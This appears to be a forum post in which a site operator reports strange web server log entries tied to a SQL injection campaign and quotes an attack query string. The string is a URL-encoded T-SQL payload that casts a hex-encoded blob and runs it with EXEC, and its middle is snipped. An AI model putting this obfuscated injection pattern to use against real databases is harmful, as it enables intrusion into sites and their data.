I'm seeing lots of weirdness in the server logs connected to this sql injection attack. Not sure what to make of it. Don't think it can be doing anything to my servers. Maybe it's just the result of other sites having been hacked. In any case, I'm getting requests with this query string tacked on the end:

';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520 [...snip...] C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);